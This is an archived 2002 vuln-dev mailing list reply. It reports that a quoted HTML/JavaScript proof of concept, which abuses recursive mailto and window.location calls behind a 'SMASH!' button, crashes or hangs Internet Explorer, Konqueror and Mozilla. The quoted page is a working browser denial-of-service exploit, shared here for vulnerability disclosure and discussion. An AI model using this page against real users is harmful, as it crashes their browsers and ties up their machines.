Re: Buffer Overflow with all versions of Internet Explorer and Javacript.
From: Scott Mackenzie (smackenz@sdf.lonestar.org)Date: 06/03/02
- Previous message: Matias Sedalo: "Buffer Overflow with all versions of Internet Explorer and Javacript."
- In reply to: Matias Sedalo: "Buffer Overflow with all versions of Internet Explorer and Javacript."
- Next in thread: Jacek Lach: "Re: Buffer Overflow with all versions of Internet Explorer and Javacript."
- Next in thread: Gian Fabio Palmerini: "Re: Buffer Overflow with all versions of Internet Explorer and Javacript."
- Reply: Jacek Lach: "Re: Buffer Overflow with all versions of Internet Explorer and Javacript."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: Scott Mackenzie <smackenz@sdf.lonestar.org> To: vuln-dev@securityfocus.com Date: 03 Jun 2002 00:47:52 +0100
After a few minutes testing it seems this does not only effect Internet
Explorer but also the following browsers:
In KDE's konqueror Latest Version it Seg Faults the browser instantly
In Mozilla 0.99 it causes a Denial of Service situation against the
machine with 100% CPU usage, and some crazy hard drive accessing until
the process is killed
Other information:
Netscape 6 series latest version does nothing when SMASH! is clicked
Galeon latest tries to mail a rather long email address, but the browser
itself is un-effected
Test System:
Linux Redhat 7.3 2.4.18-4 #1 Thu May 2 18:06:25 EDT 2002 i686
---------------------------------
Scott Mackenzie
Cybernetics & Virtual Worlds (2)
Bradford University
http://smackenz.zapto.org
---------------------------------
On Sun, 2002-06-02 at 22:08, Matias Sedalo wrote:
> the 28/07/1999 I have discovered a stack buffer overflow caused by until
> the moment all the versions of the Internet Explorer.
> In many windows98 causes the necessity to reinitiate the equipment, since
> to my to seem it remains without memory.
> Only it has been proven in several versions 5 of IE on WindowsNT
> server sp6 and windows98 Second Edition. As I said before the Windows 98
> I had to reinitiate it to the force.
> Can be possible to execute arbitrary code using the variable company of
> the example?
>
> // internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6
> // internet Explorer 5.00.3500.1003 on Windows98se
>
> -----------cut here---------------------------
> <html><head></head>
> <script language="JAVASCRIPT">
> function hacerMail() {
> var company;
>
> crear();
> address="s0t4ipv6@shellcode.com.ar";
> soporte();
> }
> function soporte(){
> var soporte="bill@mocosoft.com";
> window.location="mailto:"+address+"?cc="+soporte+"&subject="+company;
> // window.location=company; // also this line cause the bof.
> close(hacerMail());
> }
> function crear(){
> company="shellcode here?\n"; // i don't think so.
> }
> </script>
> <input type="button" onClick="hacerMail();" value="SMASH!"></input>
> </html>
> -----------cut here---------------------------
>
> Regards.
>
> - Internet es perjudicial para la salud -
> - Ley N~ 127.0.0.1
>
> Matias Sedalo
> http://www.shellcode.com.ar
>
> s0t4ipv6@shellcode.com.ar
> B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2
> .......................................
>
>
>
>
- Previous message: Matias Sedalo: "Buffer Overflow with all versions of Internet Explorer and Javacript."
- In reply to: Matias Sedalo: "Buffer Overflow with all versions of Internet Explorer and Javacript."
- Next in thread: Jacek Lach: "Re: Buffer Overflow with all versions of Internet Explorer and Javacript."
- Next in thread: Gian Fabio Palmerini: "Re: Buffer Overflow with all versions of Internet Explorer and Javacript."
- Reply: Jacek Lach: "Re: Buffer Overflow with all versions of Internet Explorer and Javacript."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
